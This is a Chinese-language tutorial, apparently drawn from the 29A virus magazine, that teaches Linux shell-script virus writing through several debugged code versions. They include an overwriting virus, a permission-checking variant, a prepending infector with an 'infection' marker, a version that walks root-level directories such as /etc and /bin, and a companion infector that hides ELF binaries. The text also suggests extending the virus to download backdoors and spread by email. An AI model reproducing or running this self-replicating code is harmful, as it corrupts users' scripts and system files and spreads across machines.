感染linux指令碼程式技術

前言
----
本文來源於29A病毒雜誌,其上對linux shell病毒技術有了一個綜合的闡述,我不想翻譯它,我以它的那篇為模板
寫了這篇中文的文章,裡面的代碼我都做了調試.
對於shell編程的程式員來說所謂的shell病毒技術其實根本就是小牛一毛,這點在大家看完本文後就會有所體會
但,簡單歸簡單,我們還是要去瞭解它,呵呵.

主要的shell病毒技術
-------------------
當然,本文需要你至少瞭解linux shell編程的基礎知識和一星點的病毒知識.
ok!我們進入正題!
我們來看一個最原始的shell病毒,代碼最能說明問題:
---------------------------------------------------------
#shellvirus I
for file in *
do
cp $0 $file
done
---------------------------------------------------------
簡單吧?遍曆當前檔案系統的所有檔案,然後覆蓋所有檔案.但是,我們知道linux是多使用者的作業系統,它的檔案是具有
保護模式的,所以以上的指令碼有可能會報出一大堆的錯誤,所以它很快就會被管理員發現並制止它的傳染.所以我們可以
為該指令碼做個判斷,這樣隱蔽性就大大增強了:
---------------------------------------------------------
#shellvirus II
for file in *
do
if test -f $file
then
if test -x $file
then
if test -w $file
then
if grep -s echo $file >.mmm
then
cp $0 $file
fi; fi; fi; fi; fi
done
rm .mmm -f
---------------------------------------------------------
ok.我們改進了一下,加了若干的判斷,判斷檔案是否存在,是否檔案可執行,是否我們有許可權寫,再判斷它是否是指令碼程式
如果是就cp $0 $file,所以這段代碼是感然該系統所有的指令碼程式的,危害性還是比較大的.if grep -s echo $file>/.mmm
這句也可以這樣寫:if file $file | grep -s 'Bourne shell script' > /dev/nul ; then,也就是判斷file是否為shell
指令碼程式.
但是,指令碼病毒一旦在感染完畢之後就什麼也不做了,它沒有象二進位病毒那樣的潛伏的危害性,而且以上的指令碼只是簡
單的覆蓋宿主而已,所以我這裡利用了一下傳統的二進位病毒的感染機制,效果也不錯:),看看下面代碼:
---------------------------------------------------------
#infection
head -n 24 $0 > .test<-取自身儲存到.test
for file in *<-遍曆檔案系統
do
if test -f $file<-判斷是否為檔案
then
if test -x $file<-判斷檔案是否可執行
then
if test -w $file<-判斷檔案是否可寫
then
if grep -s echo $file >.mmm<-判斷是否為指令碼程式
then
head -n 1 $file >.mm<-提取要感染的指令碼程式的第一行
if grep -s infection .mm >.mmm<-判斷該檔案是否已經被感染
then
rm -f .mm<-已經被感染,則跳過
else<-還未被感染
cat $file > .SAVEE<-很熟悉吧?借用了傳統的二進位檔案的感染機制
cat .test > $file
cat .SAVEE >> $file
fi; fi; fi; fi; fi
done
rm .test .SAVEE .mmm .mm -f
--------------------------------------------------------
程式的註解足以說明了,其實增加了潛伏的危害性,但還是特容易被發現,沒辦法的事情,shell指令碼一般都是明文的,呵呵.不過
危害性已經相當大了.這段程式用了一個感染標誌:infection來判斷是否已經被感染,著在程式中可以反應出來.
ok,為了使上面的代碼不容易被發現,我必須最佳化它,最先考慮的肯定是精練代碼:
--------------------------------------------------------
#infection
for file in * ;do
if test -f $file && test -x $file && test -w $file ; then
if grep -s echo $file > /dev/nul ; then
head -n 1 $file >.mm
if grep -s infection .mm > /dev/nul ; then
rm .mm -f ; else
cat $file > .SAVEE
head -n 13 $0 > $file
cat .SAVEE >> $file
fi; fi; fi
done
rm .SAVEE .mm -f
--------------------------------------------------------
現在只有兩個臨時檔案的產生了,代碼也被精簡到了13行.當然可以完全用;來把代碼甚至寫到1-2行,但這裡我只是說明問題,就
不寫出來了.
好,我們看看,shell病毒還能做哪些有用的事情,有可能我們想感染別的目錄的檔案,比如根目錄或者是/etc,/bin等等,因為大多
數有用的系統配置指令碼都存放在那些目錄下,只要對上述代碼稍作改動就可以實現了:)
--------------------------------------------------------
#infection
xtemp=$pwd<-儲存當前路徑
head -n 22 $0 > /.test
for dir in /* ; do<-遍曆/目錄
if test -d $dir ; then<-如果是目錄就cd該目錄
cd $dir
for file in * ; do<-遍曆該目錄檔案
if test -f $file && test -x $file && test -w $file ; then<-確定檔案是否可執行,可寫
if grep -s echo $file > /dev/nul ; then<-確定是否為指令碼程式
head -n 1 $file > .mm
if grep -s infection .mm > /dev/nul ; then<-確定是否已經被感染
rm .mm -f ; else
cat $file > /.SAVEE<-和前面的感染機制一樣感染未被感染的指令碼程式
cat /.test > $file
cat /.SAVEE >> $file
fi; fi; fi
done
cd ..
fi
done
cd $xtemp<-返回原目錄
rm /.test /.SAVEE .mm -f
-------------------------------------------------------------
其實這段代碼只感染了/目錄下的一層目錄.當然我們可以使它感染的更深,只是加幾個迴圈而已.同樣shell病毒可以做很多事情
如download後門程式,為機器自動開後門,主動去攻擊連網的其他機器,取使用者的email來發送傳染等等.總之它的實現技術不高深,
但也比較實用,還是值得去說明一下的,呵呵.
同樣,我們也可以感染elf檔案,但危害性很小,這裡不重點講,給個常式大家理解一下吧:)
-------------------------------------------------------------
for file in * ;do
if test -f $file && test -x $file && test -w $file ; then
if file $file | grep -s 'ELF' > /dev/nul ; then
mv $file .$file
head -n 9 $0 > $file
fi; fi
done
.$0
-------------------------------------------------------------